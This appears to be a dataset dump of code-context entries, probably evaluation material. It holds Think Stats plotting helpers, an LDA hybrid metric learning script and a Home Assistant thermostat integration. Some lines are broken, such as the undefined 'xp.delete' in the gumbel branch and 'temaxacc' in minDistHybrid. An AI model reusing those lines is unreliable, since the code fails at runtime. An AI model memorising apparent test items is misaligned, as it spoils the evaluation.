gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
"""This file contains code for use with "Think Stats",
by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function
import logging
import math
import matplotlib
import matplotlib.pyplot as pyplot
import numpy as np
import pandas
# customize some matplotlib attributes
#matplotlib.rc('figure', figsize=(4, 3))
#matplotlib.rc('font', size=14.0)
#matplotlib.rc('axes', labelsize=22.0, titlesize=22.0)
#matplotlib.rc('legend', fontsize=20.0)
#matplotlib.rc('xtick.major', size=6.0)
#matplotlib.rc('xtick.minor', size=3.0)
#matplotlib.rc('ytick.major', size=6.0)
#matplotlib.rc('ytick.minor', size=3.0)
class _Brewer(object):
"""Encapsulates a nice sequence of colors.
Shades of blue that look good in color and can be distinguished
in grayscale (up to a point).
Borrowed from http://colorbrewer2.org/
"""
color_iter = None
colors = ['#081D58',
'#253494',
'#225EA8',
'#1D91C0',
'#41B6C4',
'#7FCDBB',
'#C7E9B4',
'#EDF8B1',
'#FFFFD9']
# lists that indicate which colors to use depending on how many are used
which_colors = [[],
[1],
[1, 3],
[0, 2, 4],
[0, 2, 4, 6],
[0, 2, 3, 5, 6],
[0, 2, 3, 4, 5, 6],
[0, 1, 2, 3, 4, 5, 6],
]
@classmethod
def Colors(cls):
"""Returns the list of colors.
"""
return cls.colors
@classmethod
def ColorGenerator(cls, n):
"""Returns an iterator of color strings.
n: how many colors will be used
"""
for i in cls.which_colors[n]:
yield cls.colors[i]
raise StopIteration('Ran out of colors in _Brewer.ColorGenerator')
@classmethod
def InitializeIter(cls, num):
"""Initializes the color iterator with the given number of colors."""
cls.color_iter = cls.ColorGenerator(num)
@classmethod
def ClearIter(cls):
"""Sets the color iterator to None."""
cls.color_iter = None
@classmethod
def GetIter(cls):
"""Gets the color iterator."""
if cls.color_iter is None:
cls.InitializeIter(7)
return cls.color_iter
def PrePlot(num=None, rows=None, cols=None):
"""Takes hints about what's coming.
num: number of lines that will be plotted
rows: number of rows of subplots
cols: number of columns of subplots
"""
if num:
_Brewer.InitializeIter(num)
if rows is None and cols is None:
return
if rows is not None and cols is None:
cols = 1
if cols is not None and rows is None:
rows = 1
# resize the image, depending on the number of rows and cols
size_map = {(1, 1): (8, 6),
(1, 2): (14, 6),
(1, 3): (14, 6),
(2, 2): (10, 10),
(2, 3): (16, 10),
(3, 1): (8, 10),
}
if (rows, cols) in size_map:
fig = pyplot.gcf()
fig.set_size_inches(*size_map[rows, cols])
# create the first subplot
if rows > 1 or cols > 1:
pyplot.subplot(rows, cols, 1)
global SUBPLOT_ROWS, SUBPLOT_COLS
SUBPLOT_ROWS = rows
SUBPLOT_COLS = cols
def SubPlot(plot_number, rows=None, cols=None):
"""Configures the number of subplots and changes the current plot.
rows: int
cols: int
plot_number: int
"""
rows = rows or SUBPLOT_ROWS
cols = cols or SUBPLOT_COLS
pyplot.subplot(rows, cols, plot_number)
def _Underride(d, **options):
"""Add key-value pairs to d only if key is not in d.
If d is None, create a new dictionary.
d: dictionary
options: keyword args to add to d
"""
if d is None:
d = {}
for key, val in options.items():
d.setdefault(key, val)
return d
def Clf():
"""Clears the figure and any hints that have been set."""
_Brewer.ClearIter()
pyplot.clf()
fig = pyplot.gcf()
fig.set_size_inches(8, 6)
def Figure(**options):
"""Sets options for the current figure."""
_Underride(options, figsize=(6, 8))
pyplot.figure(**options)
def _UnderrideColor(options):
if 'color' in options:
return options
color_iter = _Brewer.GetIter()
if color_iter:
try:
options['color'] = next(color_iter)
except StopIteration:
print('Warning: Brewer ran out of colors.')
_Brewer.ClearIter()
return options
def Plot(obj, ys=None, style='', **options):
"""Plots a line.
Args:
obj: sequence of x values, or Series, or anything with Render()
ys: sequence of y values
style: style string passed along to pyplot.plot
options: keyword args passed to pyplot.plot
"""
options = _UnderrideColor(options)
label = getattr(obj, 'label', '_nolegend_')
options = _Underride(options, linewidth=3, alpha=0.8, label=label)
xs = obj
if ys is None:
if hasattr(obj, 'Render'):
xs, ys = obj.Render()
if isinstance(obj, pandas.Series):
ys = obj.values
xs = obj.index
if ys is None:
pyplot.plot(xs, style, **options)
else:
pyplot.plot(xs, ys, style, **options)
def FillBetween(xs, y1, y2=None, where=None, **options):
"""Plots a line.
Args:
xs: sequence of x values
y1: sequence of y values
y2: sequence of y values
where: sequence of boolean
options: keyword args passed to pyplot.fill_between
"""
options = _UnderrideColor(options)
options = _Underride(options, linewidth=0, alpha=0.5)
pyplot.fill_between(xs, y1, y2, where, **options)
def Bar(xs, ys, **options):
"""Plots a line.
Args:
xs: sequence of x values
ys: sequence of y values
options: keyword args passed to pyplot.bar
"""
options = _UnderrideColor(options)
options = _Underride(options, linewidth=0, alpha=0.6)
pyplot.bar(xs, ys, **options)
def Scatter(xs, ys=None, **options):
"""Makes a scatter plot.
xs: x values
ys: y values
options: options passed to pyplot.scatter
"""
options = _Underride(options, color='blue', alpha=0.2,
s=30, edgecolors='none')
if ys is None and isinstance(xs, pandas.Series):
ys = xs.values
xs = xs.index
pyplot.scatter(xs, ys, **options)
def HexBin(xs, ys, **options):
"""Makes a scatter plot.
xs: x values
ys: y values
options: options passed to pyplot.scatter
"""
options = _Underride(options, cmap=matplotlib.cm.Blues)
pyplot.hexbin(xs, ys, **options)
def Pdf(pdf, **options):
"""Plots a Pdf, Pmf, or Hist as a line.
Args:
pdf: Pdf, Pmf, or Hist object
options: keyword args passed to pyplot.plot
"""
low, high = options.pop('low', None), options.pop('high', None)
n = options.pop('n', 101)
xs, ps = pdf.Render(low=low, high=high, n=n)
options = _Underride(options, label=pdf.label)
Plot(xs, ps, **options)
def Pdfs(pdfs, **options):
"""Plots a sequence of PDFs.
Options are passed along for all PDFs. If you want different
options for each pdf, make multiple calls to Pdf.
Args:
pdfs: sequence of PDF objects
options: keyword args passed to pyplot.plot
"""
for pdf in pdfs:
Pdf(pdf, **options)
def Hist(hist, **options):
"""Plots a Pmf or Hist with a bar plot.
The default width of the bars is based on the minimum difference
between values in the Hist. If that's too small, you can override
it by providing a width keyword argument, in the same units
as the values.
Args:
hist: Hist or Pmf object
options: keyword args passed to pyplot.bar
"""
# find the minimum distance between adjacent values
xs, ys = hist.Render()
if 'width' not in options:
try:
options['width'] = 0.9 * np.diff(xs).min()
except TypeError:
logging.warning("Hist: Can't compute bar width automatically."
"Check for non-numeric types in Hist."
"Or try providing width option."
)
options = _Underride(options, label=hist.label)
options = _Underride(options, align='center')
if options['align'] == 'left':
options['align'] = 'edge'
elif options['align'] == 'right':
options['align'] = 'edge'
options['width'] *= -1
Bar(xs, ys, **options)
def Hists(hists, **options):
"""Plots two histograms as interleaved bar plots.
Options are passed along for all PMFs. If you want different
options for each pmf, make multiple calls to Pmf.
Args:
hists: list of two Hist or Pmf objects
options: keyword args passed to pyplot.plot
"""
for hist in hists:
Hist(hist, **options)
def Pmf(pmf, **options):
"""Plots a Pmf or Hist as a line.
Args:
pmf: Hist or Pmf object
options: keyword args passed to pyplot.plot
"""
xs, ys = pmf.Render()
low, high = min(xs), max(xs)
width = options.pop('width', None)
if width is None:
try:
width = np.diff(xs).min()
except TypeError:
logging.warning("Pmf: Can't compute bar width automatically."
"Check for non-numeric types in Pmf."
"Or try providing width option.")
points = []
lastx = np.nan
lasty = 0
for x, y in zip(xs, ys):
if (x - lastx) > 1e-5:
points.append((lastx, 0))
points.append((x, 0))
points.append((x, lasty))
points.append((x, y))
points.append((x+width, y))
lastx = x + width
lasty = y
points.append((lastx, 0))
pxs, pys = zip(*points)
align = options.pop('align', 'center')
if align == 'center':
pxs = np.array(pxs) - width/2.0
if align == 'right':
pxs = np.array(pxs) - width
options = _Underride(options, label=pmf.label)
Plot(pxs, pys, **options)
def Pmfs(pmfs, **options):
"""Plots a sequence of PMFs.
Options are passed along for all PMFs. If you want different
options for each pmf, make multiple calls to Pmf.
Args:
pmfs: sequence of PMF objects
options: keyword args passed to pyplot.plot
"""
for pmf in pmfs:
Pmf(pmf, **options)
def Diff(t):
"""Compute the differences between adjacent elements in a sequence.
Args:
t: sequence of number
Returns:
sequence of differences (length one less than t)
"""
diffs = [t[i+1] - t[i] for i in range(len(t)-1)]
return diffs
def Cdf(cdf, complement=False, transform=None, **options):
"""Plots a CDF as a line.
Args:
cdf: Cdf object
complement: boolean, whether to plot the complementary CDF
transform: string, one of 'exponential', 'pareto', 'weibull', 'gumbel'
options: keyword args passed to pyplot.plot
Returns:
dictionary with the scale options that should be passed to
Config, Show or Save.
"""
xs, ps = cdf.Render()
xs = np.asarray(xs)
ps = np.asarray(ps)
scale = dict(xscale='linear', yscale='linear')
for s in ['xscale', 'yscale']:
if s in options:
scale[s] = options.pop(s)
if transform == 'exponential':
complement = True
scale['yscale'] = 'log'
if transform == 'pareto':
complement = True
scale['yscale'] = 'log'
scale['xscale'] = 'log'
if complement:
ps = [1.0-p for p in ps]
if transform == 'weibull':
xs = np.delete(xs, -1)
ps = np.delete(ps, -1)
ps = [-math.log(1.0-p) for p in ps]
scale['xscale'] = 'log'
scale['yscale'] = 'log'
if transform == 'gumbel':
xs = xp.delete(xs, 0)
ps = np.delete(ps, 0)
ps = [-math.log(p) for p in ps]
scale['yscale'] = 'log'
options = _Underride(options, label=cdf.label)
Plot(xs, ps, **options)
return scale
def Cdfs(cdfs, complement=False, transform=None, **options):
"""Plots a sequence of CDFs.
cdfs: sequence of CDF objects
complement: boolean, whether to plot the complementary CDF
transform: string, one of 'exponential', 'pareto', 'weibull', 'gumbel'
options: keyword args passed to pyplot.plot
"""
for cdf in cdfs:
Cdf(cdf, complement, transform, **options)
def Contour(obj, pcolor=False, contour=True, imshow=False, **options):
"""Makes a contour plot.
d: map from (x, y) to z, or object that provides GetDict
pcolor: boolean, whether to make a pseudocolor plot
contour: boolean, whether to make a contour plot
imshow: boolean, whether to use pyplot.imshow
options: keyword args passed to pyplot.pcolor and/or pyplot.contour
"""
try:
d = obj.GetDict()
except AttributeError:
d = obj
_Underride(options, linewidth=3, cmap=matplotlib.cm.Blues)
xs, ys = zip(*d.keys())
xs = sorted(set(xs))
ys = sorted(set(ys))
X, Y = np.meshgrid(xs, ys)
func = lambda x, y: d.get((x, y), 0)
func = np.vectorize(func)
Z = func(X, Y)
x_formatter = matplotlib.ticker.ScalarFormatter(useOffset=False)
axes = pyplot.gca()
axes.xaxis.set_major_formatter(x_formatter)
if pcolor:
pyplot.pcolormesh(X, Y, Z, **options)
if contour:
cs = pyplot.contour(X, Y, Z, **options)
pyplot.clabel(cs, inline=1, fontsize=10)
if imshow:
extent = xs[0], xs[-1], ys[0], ys[-1]
pyplot.imshow(Z, extent=extent, **options)
def Pcolor(xs, ys, zs, pcolor=True, contour=False, **options):
"""Makes a pseudocolor plot.
xs:
ys:
zs:
pcolor: boolean, whether to make a pseudocolor plot
contour: boolean, whether to make a contour plot
options: keyword args passed to pyplot.pcolor and/or pyplot.contour
"""
_Underride(options, linewidth=3, cmap=matplotlib.cm.Blues)
X, Y = np.meshgrid(xs, ys)
Z = zs
x_formatter = matplotlib.ticker.ScalarFormatter(useOffset=False)
axes = pyplot.gca()
axes.xaxis.set_major_formatter(x_formatter)
if pcolor:
pyplot.pcolormesh(X, Y, Z, **options)
if contour:
cs = pyplot.contour(X, Y, Z, **options)
pyplot.clabel(cs, inline=1, fontsize=10)
def Text(x, y, s, **options):
"""Puts text in a figure.
x: number
y: number
s: string
options: keyword args passed to pyplot.text
"""
options = _Underride(options, verticalalignment='top',
horizontalalignment='left')
pyplot.text(x, y, s, **options)
def Config(**options):
"""Configures the plot.
Pulls options out of the option dictionary and passes them to
the corresponding pyplot functions.
"""
names = ['title', 'xlabel', 'ylabel', 'xscale', 'yscale',
'xticks', 'yticks', 'axis', 'xlim', 'ylim']
for name in names:
if name in options:
getattr(pyplot, name)(options[name])
# looks like this is not necessary: matplotlib understands text loc specs
loc_dict = {'upper right': 1,
'upper left': 2,
'lower left': 3,
'lower right': 4,
'right': 5,
'center left': 6,
'center right': 7,
'lower center': 8,
'upper center': 9,
'center': 10,
}
loc = options.get('loc', 0)
#loc = loc_dict.get(loc, loc)
legend = options.get('legend', True)
if legend:
pyplot.legend(loc=loc)
def Show(**options):
"""Shows the plot.
For options, see Config.
options: keyword args used to invoke various pyplot functions
"""
clf = options.pop('clf', True)
Config(**options)
pyplot.show()
if clf:
Clf()
def Plotly(**options):
"""Shows the plot.
For options, see Config.
options: keyword args used to invoke various pyplot functions
"""
clf = options.pop('clf', True)
Config(**options)
import plotly.plotly as plotly
url = plotly.plot_mpl(pyplot.gcf())
if clf:
Clf()
return url
def Save(root=None, formats=None, **options):
"""Saves the plot in the given formats and clears the figure.
For options, see Config.
Args:
root: string filename root
formats: list of string formats
options: keyword args used to invoke various pyplot functions
"""
clf = options.pop('clf', True)
Config(**options)
if formats is None:
formats = ['pdf', 'eps']
try:
formats.remove('plotly')
Plotly(clf=False)
except ValueError:
pass
if root:
for fmt in formats:
SaveFormat(root, fmt)
if clf:
Clf()
def SaveFormat(root, fmt='eps'):
"""Writes the current figure to a file in the given format.
Args:
root: string filename root
fmt: string format
"""
filename = '%s.%s' % (root, fmt)
print('Writing', filename)
pyplot.savefig(filename, format=fmt, dpi=300)
# provide aliases for calling functons with lower-case names
preplot = PrePlot
subplot = SubPlot
clf = Clf
figure = Figure
plot = Plot
scatter = Scatter
pmf = Pmf
pmfs = Pmfs
hist = Hist
hists = Hists
diff = Diff
cdf = Cdf
cdfs = Cdfs
contour = Contour
pcolor = Pcolor
config = Config
show = Show
save = Save
def main():
color_iter = _Brewer.ColorGenerator(7)
for color in color_iter:
print(color)
if __name__ == '__main__':
main()
|
|
# hybrid_lda.py
# Implementation of LDA-based hybrid metric learning
# Author: Brian D. Bue (bbue@rice.edu)
# Last modified: 5/14/12
#
# If you use this code in a publication, please cite the following paper:
# B. Bue and E. Merenyi, "An Adaptive Similarity Measure for Classification
# of Hyperspectral Signatures," IEEE Geoscience and Remote Sensing
# Letters, 2012.
#
# Copyright: 2010-2012 Rice University
from aux import *
def solveLDA(B,W,k,lambdav=0.0,convex=False):
'''
Calculates matrix A maximizing regularized LDA objective
Arguments:
- B: D x D between class scatter matrix
- W: D x D within class scatter matrix
- k: rank of LDA solution
Keyword arguments:
- lambdav: regularization parameter \in [0,1]
- convex: if true and k==1, return convex vector of A coefficients
Returns:
- A: D x k LDA transformation matrix
'''
from numpy.linalg import eig, inv
from numpy import asmatrix, argsort, eye, sum
B = asmatrix(B)
W = asmatrix((1-lambdav)*W + lambdav*eye(W.shape[0]))
eigvals,eigvecs = eig(inv(W)*B)
maxi = argsort(eigvals)[-k:]
A = eigvecs[:,maxi]
if convex:
if k==1:
# A = asmatrix(A)
# So = (A.T*B*A) / (A.T*W*A)
# print So, S, e1 # convex / non-convex solutions equal
# So = (A.T*B*A) / (A.T*W*A)
A /= sum(A) # convex-ify solution
else:
print 'Error: can only convex-ify top eigenvector,',
print 'returning nonconvex solution'
return A
def alphaLDA(X,labels,lambdav=0.0,metrics=['SqEuclidean']):
'''
LDA-based hybrid metric learning.
Arguments:
- X: list of D representations of samples, each X[i] an n x d matrix
- labels: list of n labels for each sample in X[i]
Keyword arguments:
- lambdav: regularization parameter \in [0,1]
- metrics: list of 1 or D metric types for each representation
see scipy.spatial.distance.cdist docs for possible types
Returns:
- A: \alpha coefficients
'''
from numpy import asarray, zeros
if lambdav < 0 or lambdav > 1:
print "Error: lambdav must be in [0,1] range"
exit()
D = len(X)
ulab = unique(labels)
k = len(ulab)
N = len(labels)
Ni = classCounts(labels)
B = zeros([D,D])
W = zeros([D,D])
if len(metrics)==1:
metrics = [metrics[0]]*D
for i in range(D):
Xi = X[i]
Mi = classMeans(Xi,labels)
Mui = vecmean(Mi)
for j in range(i+1,D):
Xj = X[j]
Mj = classMeans(Xj,labels)
Muj = vecmean(Mj)
# calculate within-class scatter
Wii, Wij, Wjj = 0,0,0
for l in range(k):
maskl = labels==ulab[l]
Wdisti = distanceMatrix(Xi[maskl], Mi[l], metric=metrics[i])
Wdistj = distanceMatrix(Xj[maskl], Mj[l], metric=metrics[i])
Wii += sum(Wdisti**2)
Wjj += sum(Wdistj**2)
Wij += sum(Wdisti*Wdistj)
# calculate between-class scatter
Bdisti = distanceMatrix(Mi, Mui, metric=metrics[i])
Bdistj = distanceMatrix(Mj, Muj, metric=metrics[i])
Bii = sum(Ni*(Bdisti**2))
Bjj = sum(Ni*(Bdistj**2))
Bij = sum(Ni*(Bdisti*Bdistj))
W[i,j] = W[j,i] = Wij
B[i,j] = B[j,i] = Bij
W[i,i],W[j,j] = Wii,Wjj
B[i,i],B[j,j] = Bii,Bjj
B /= N
W /= N
A = solveLDA(B,W,1,lambdav,convex=True)
return asarray(A).flatten()
def minDistHybrid(X,lab,lambdas=[0],Dlab=[],verbose=False,norm='none'):
'''
Hybrid metric learning with minimum distance to class means classifier.
Learns the LDA-based weight vector \alpha to combine distances
between D representations of samples X.
Arguments:
- X: list of samples in D representations, each X[i] is an n x d matrix
- lab: n dimensional vector of labels for each sample in X
Keyword arguments:
- lambdas: list of lambda-values for regularization, default=[0] (no regularization)
the best lambda value will be selected from this list according to its performance
training set.
- verbose: print verbose output, default=False
- Dlab: list of string labels for each of the D representations
- norm: normalization type ('none', 'L2' or 'std')
'''
from numpy import min,max,zeros,ones
D = len(X)
metrics=['SqEuclidean']*D # base metrics for each representation
if len(Dlab) != D:
Dlab = ['X%d'%i for i in range(D)]
# 50/50 training set split
tridx,teidx = stratSplit(lab,splitp=0.5)
trlab,telab,ulab = lab[tridx],lab[teidx],unique(lab)
trXN = [Xi[tridx] for Xi in X]
teXN = [Xi[teidx] for Xi in X]
# normalize each sample in each representation
if norm=='L2': # ...by euclidean norm
trXN = [eucRowNorm(trXi) for trXi in trXN]
teXN = [eucRowNorm(teXi) for teXi in teXN]
elif norm=='std': # ...by std. dev. of each representation
from numpy import sqrt, std
vars = [std(Xi.flatten()) for Xi in X]
trXN = [trXi/vari for trXi,vari in zip(trXN,vars)]
teXN = [teXi/vari for teXi,vari in zip(teXN,vars)]
# training class means (per representation)
trXNmu = [classMeans(trXNi,trlab) for trXNi in trXN]
# distance matrices to training means in each representation
trXNdmats = [distanceMatrix(trXN[i],trXNmu[i],metric=metrics[i])
for i in range(D)]
teXNdmats = [distanceMatrix(teXN[i],trXNmu[i],metric=metrics[i])
for i in range(D)]
bestalpha,bestlambda = ones(D)/D,-1
trmaxacc = -1.0
for lambdav in lambdas:
alpha = alphaLDA(trXN,trlab,lambdav,metrics=metrics)
if min(alpha) < 0 or max(alpha) > 1: # ill-posed eigendecomposition
continue
# accumulate distance matrices for train/test points, weighted by alpha
trHybrid_dmat = zeros(trXNdmats[0].shape)
teHybrid_dmat = zeros(teXNdmats[0].shape)
for i,a in enumerate(alpha):
trHybrid_dmat += a*trXNdmats[i]
teHybrid_dmat += a*teXNdmats[i]
trpred = minDist(trHybrid_dmat,ulab)
tepred = minDist(teHybrid_dmat,ulab)
tracc = accuracy(trlab,trpred)
teacc = accuracy(telab,tepred)
if verbose:
print 'lambda=',lambdav,'alpha=',alpha,
print 'Tr hybrid acc=', tracc,
print 'Te hybrid acc=', teacc
if tracc > trmaxacc:
trmaxacc = tracc
bestalpha,bestlambda = alpha,lambdav
if trmaxacc < 0:
print 'Error: Could not determine a viable solution with provided data and regularization parameters'
return
for i,XNdmati in enumerate(trXNdmats):
trpred = minDist(XNdmati,ulab)
print 'Tr '+Dlab[i]+' acc=%0.3f'%accuracy(trlab,trpred),
print 'Tr hybrid acc=%0.3f'%trmaxacc
for i,XNdmati in enumerate(teXNdmats):
tepred = minDist(XNdmati,ulab)
print 'Te '+Dlab[i]+' acc=%0.3f'%accuracy(telab,tepred),
print 'Te hybrid acc=%0.3f'%temaxacc
print 'best alpha=',bestalpha,
print 'best lambda=',bestlambda
|
|
"""Support for Radio Thermostat wifi-enabled home thermostats."""
import logging
from socket import timeout
import radiotherm
import voluptuous as vol
from homeassistant.components.climate import PLATFORM_SCHEMA, ClimateEntity
from homeassistant.components.climate.const import (
CURRENT_HVAC_COOL,
CURRENT_HVAC_HEAT,
CURRENT_HVAC_IDLE,
FAN_OFF,
FAN_ON,
HVAC_MODE_AUTO,
HVAC_MODE_COOL,
HVAC_MODE_HEAT,
HVAC_MODE_OFF,
PRESET_AWAY,
PRESET_HOME,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_TARGET_TEMPERATURE,
)
from homeassistant.const import (
ATTR_TEMPERATURE,
CONF_HOST,
PRECISION_HALVES,
STATE_ON,
TEMP_FAHRENHEIT,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.util import dt as dt_util
_LOGGER = logging.getLogger(__name__)
ATTR_FAN_ACTION = "fan_action"
CONF_HOLD_TEMP = "hold_temp"
PRESET_HOLIDAY = "holiday"
PRESET_ALTERNATE = "alternate"
STATE_CIRCULATE = "circulate"
PRESET_MODES = [PRESET_HOME, PRESET_ALTERNATE, PRESET_AWAY, PRESET_HOLIDAY]
OPERATION_LIST = [HVAC_MODE_AUTO, HVAC_MODE_COOL, HVAC_MODE_HEAT, HVAC_MODE_OFF]
CT30_FAN_OPERATION_LIST = [STATE_ON, HVAC_MODE_AUTO]
CT80_FAN_OPERATION_LIST = [STATE_ON, STATE_CIRCULATE, HVAC_MODE_AUTO]
# Mappings from radiotherm json data codes to and from Home Assistant state
# flags. CODE is the thermostat integer code and these map to and
# from Home Assistant state flags.
# Programmed temperature mode of the thermostat.
CODE_TO_TEMP_MODE = {
0: HVAC_MODE_OFF,
1: HVAC_MODE_HEAT,
2: HVAC_MODE_COOL,
3: HVAC_MODE_AUTO,
}
TEMP_MODE_TO_CODE = {v: k for k, v in CODE_TO_TEMP_MODE.items()}
# Programmed fan mode (circulate is supported by CT80 models)
CODE_TO_FAN_MODE = {0: HVAC_MODE_AUTO, 1: STATE_CIRCULATE, 2: STATE_ON}
FAN_MODE_TO_CODE = {v: k for k, v in CODE_TO_FAN_MODE.items()}
# Active thermostat state (is it heating or cooling?). In the future
# this should probably made into heat and cool binary sensors.
CODE_TO_TEMP_STATE = {0: CURRENT_HVAC_IDLE, 1: CURRENT_HVAC_HEAT, 2: CURRENT_HVAC_COOL}
# Active fan state. This is if the fan is actually on or not. In the
# future this should probably made into a binary sensor for the fan.
CODE_TO_FAN_STATE = {0: FAN_OFF, 1: FAN_ON}
PRESET_MODE_TO_CODE = {"home": 0, "alternate": 1, "away": 2, "holiday": 3}
CODE_TO_PRESET_MODE = {0: "home", 1: "alternate", 2: "away", 3: "holiday"}
CODE_TO_HOLD_STATE = {0: False, 1: True}
def round_temp(temperature):
"""Round a temperature to the resolution of the thermostat.
RadioThermostats can handle 0.5 degree temps so the input
temperature is rounded to that value and returned.
"""
return round(temperature * 2.0) / 2.0
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_HOST): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_HOLD_TEMP, default=False): cv.boolean,
}
)
SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_FAN_MODE | SUPPORT_PRESET_MODE
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Radio Thermostat."""
hosts = []
if CONF_HOST in config:
hosts = config[CONF_HOST]
else:
hosts.append(radiotherm.discover.discover_address())
if hosts is None:
_LOGGER.error("No Radiotherm Thermostats detected")
return False
hold_temp = config.get(CONF_HOLD_TEMP)
tstats = []
for host in hosts:
try:
tstat = radiotherm.get_thermostat(host)
tstats.append(RadioThermostat(tstat, hold_temp))
except OSError:
_LOGGER.exception("Unable to connect to Radio Thermostat: %s", host)
add_entities(tstats, True)
class RadioThermostat(ClimateEntity):
"""Representation of a Radio Thermostat."""
def __init__(self, device, hold_temp):
"""Initialize the thermostat."""
self.device = device
self._target_temperature = None
self._current_temperature = None
self._current_humidity = None
self._current_operation = HVAC_MODE_OFF
self._name = None
self._fmode = None
self._fstate = None
self._tmode = None
self._tstate = None
self._hold_temp = hold_temp
self._hold_set = False
self._prev_temp = None
self._preset_mode = None
self._program_mode = None
self._is_away = False
# Fan circulate mode is only supported by the CT80 models.
self._is_model_ct80 = isinstance(self.device, radiotherm.thermostat.CT80)
@property
def supported_features(self):
"""Return the list of supported features."""
return SUPPORT_FLAGS
async def async_added_to_hass(self):
"""Register callbacks."""
# Set the time on the device. This shouldn't be in the
# constructor because it's a network call. We can't put it in
# update() because calling it will clear any temporary mode or
# temperature in the thermostat. So add it as a future job
# for the event loop to run.
self.hass.async_add_job(self.set_time)
@property
def name(self):
"""Return the name of the Radio Thermostat."""
return self._name
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return TEMP_FAHRENHEIT
@property
def precision(self):
"""Return the precision of the system."""
return PRECISION_HALVES
@property
def extra_state_attributes(self):
"""Return the device specific state attributes."""
return {ATTR_FAN_ACTION: self._fstate}
@property
def fan_modes(self):
"""List of available fan modes."""
if self._is_model_ct80:
return CT80_FAN_OPERATION_LIST
return CT30_FAN_OPERATION_LIST
@property
def fan_mode(self):
"""Return whether the fan is on."""
return self._fmode
def set_fan_mode(self, fan_mode):
"""Turn fan on/off."""
code = FAN_MODE_TO_CODE.get(fan_mode)
if code is not None:
self.device.fmode = code
@property
def current_temperature(self):
"""Return the current temperature."""
return self._current_temperature
@property
def current_humidity(self):
"""Return the current temperature."""
return self._current_humidity
@property
def hvac_mode(self):
"""Return the current operation. head, cool idle."""
return self._current_operation
@property
def hvac_modes(self):
"""Return the operation modes list."""
return OPERATION_LIST
@property
def hvac_action(self):
"""Return the current running hvac operation if supported."""
if self.hvac_mode == HVAC_MODE_OFF:
return None
return self._tstate
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return self._target_temperature
@property
def preset_mode(self):
"""Return the current preset mode, e.g., home, away, temp."""
if self._program_mode == 0:
return PRESET_HOME
if self._program_mode == 1:
return PRESET_ALTERNATE
if self._program_mode == 2:
return PRESET_AWAY
if self._program_mode == 3:
return PRESET_HOLIDAY
@property
def preset_modes(self):
"""Return a list of available preset modes."""
return PRESET_MODES
def update(self):
"""Update and validate the data from the thermostat."""
# Radio thermostats are very slow, and sometimes don't respond
# very quickly. So we need to keep the number of calls to them
# to a bare minimum or we'll hit the Home Assistant 10 sec warning. We
# have to make one call to /tstat to get temps but we'll try and
# keep the other calls to a minimum. Even with this, these
# thermostats tend to time out sometimes when they're actively
# heating or cooling.
try:
# First time - get the name from the thermostat. This is
# normally set in the radio thermostat web app.
if self._name is None:
self._name = self.device.name["raw"]
# Request the current state from the thermostat.
data = self.device.tstat["raw"]
if self._is_model_ct80:
humiditydata = self.device.humidity["raw"]
except radiotherm.validate.RadiothermTstatError:
_LOGGER.warning(
"%s (%s) was busy (invalid value returned)",
self._name,
self.device.host,
)
except timeout:
_LOGGER.warning(
"Timeout waiting for response from %s (%s)",
self._name,
self.device.host,
)
else:
if self._is_model_ct80:
self._current_humidity = humiditydata
self._program_mode = data["program_mode"]
self._preset_mode = CODE_TO_PRESET_MODE[data["program_mode"]]
# Map thermostat values into various STATE_ flags.
self._current_temperature = data["temp"]
self._fmode = CODE_TO_FAN_MODE[data["fmode"]]
self._fstate = CODE_TO_FAN_STATE[data["fstate"]]
self._tmode = CODE_TO_TEMP_MODE[data["tmode"]]
self._tstate = CODE_TO_TEMP_STATE[data["tstate"]]
self._hold_set = CODE_TO_HOLD_STATE[data["hold"]]
self._current_operation = self._tmode
if self._tmode == HVAC_MODE_COOL:
self._target_temperature = data["t_cool"]
elif self._tmode == HVAC_MODE_HEAT:
self._target_temperature = data["t_heat"]
elif self._tmode == HVAC_MODE_AUTO:
# This doesn't really work - tstate is only set if the HVAC is
# active. If it's idle, we don't know what to do with the target
# temperature.
if self._tstate == CURRENT_HVAC_COOL:
self._target_temperature = data["t_cool"]
elif self._tstate == CURRENT_HVAC_HEAT:
self._target_temperature = data["t_heat"]
else:
self._current_operation = HVAC_MODE_OFF
def set_temperature(self, **kwargs):
"""Set new target temperature."""
temperature = kwargs.get(ATTR_TEMPERATURE)
if temperature is None:
return
temperature = round_temp(temperature)
if self._current_operation == HVAC_MODE_COOL:
self.device.t_cool = temperature
elif self._current_operation == HVAC_MODE_HEAT:
self.device.t_heat = temperature
elif self._current_operation == HVAC_MODE_AUTO:
if self._tstate == CURRENT_HVAC_COOL:
self.device.t_cool = temperature
elif self._tstate == CURRENT_HVAC_HEAT:
self.device.t_heat = temperature
# Only change the hold if requested or if hold mode was turned
# on and we haven't set it yet.
if kwargs.get("hold_changed", False) or not self._hold_set:
if self._hold_temp:
self.device.hold = 1
self._hold_set = True
else:
self.device.hold = 0
def set_time(self):
"""Set device time."""
# Calling this clears any local temperature override and
# reverts to the scheduled temperature.
now = dt_util.now()
self.device.time = {
"day": now.weekday(),
"hour": now.hour,
"minute": now.minute,
}
def set_hvac_mode(self, hvac_mode):
"""Set operation mode (auto, cool, heat, off)."""
if hvac_mode in (HVAC_MODE_OFF, HVAC_MODE_AUTO):
self.device.tmode = TEMP_MODE_TO_CODE[hvac_mode]
# Setting t_cool or t_heat automatically changes tmode.
elif hvac_mode == HVAC_MODE_COOL:
self.device.t_cool = self._target_temperature
elif hvac_mode == HVAC_MODE_HEAT:
self.device.t_heat = self._target_temperature
def set_preset_mode(self, preset_mode):
"""Set Preset mode (Home, Alternate, Away, Holiday)."""
if preset_mode in (PRESET_MODES):
self.device.program_mode = PRESET_MODE_TO_CODE[preset_mode]
else:
_LOGGER.error(
"Preset_mode %s not in PRESET_MODES",
preset_mode,
)
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
